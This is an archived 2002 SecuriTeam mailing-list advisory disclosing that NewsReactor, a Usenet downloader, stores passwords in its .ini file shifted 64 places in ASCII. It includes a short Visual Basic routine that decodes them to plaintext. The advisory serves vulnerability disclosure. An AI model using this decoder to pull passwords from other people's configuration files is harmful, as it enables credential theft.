[NT] NewsReactor Encryption Scheme Cracked
From: support@securiteam.comDate: 01/22/02
- Previous message: support@securiteam.com: "[TOOL] Perl2Exe Reverse Perl Extractor"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Tue, 22 Jan 2002 17:40:48 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
NewsReactor Encryption Scheme Cracked
------------------------------------------------------------------------
SUMMARY
<http://www.daansystems.com/newsreactor/> NewsReactor is a tool to
download binaries from Usenet newsgroups. The product stores the user's
password in an unsafe manner that allows attackers to retrieve the plain
text version of the "encrypted" passwords.
DETAILS
NewsReactor stores your passwords in the NewsReactor.ini file with poor
encryption. Each character is simply 64 characters up the ASCII table from
that character itself.
Exploit:
Here is a simple VB code to "decrypt" the password:
'Note: Your password is located after the "Server0PassWord=" (for example)
in the NewsReactor.ini file.
Private Sub Form_Load()
Dim YourPass As String, PrintPass As String
YourPass = InputBox("Enter in the encrypted password below.")
For x = 1 To Len(YourPass)
PrintPass = PrintPass & Chr(Asc(Mid(YourPass, x, 1)) - 64)
Next
MsgBox "Password: " & PrintPass
End
End Sub
ADDITIONAL INFORMATION
The information has been provided by <mailto:Adi@Rogers.com> Adi Feldman.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[TOOL] Perl2Exe Reverse Perl Extractor"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|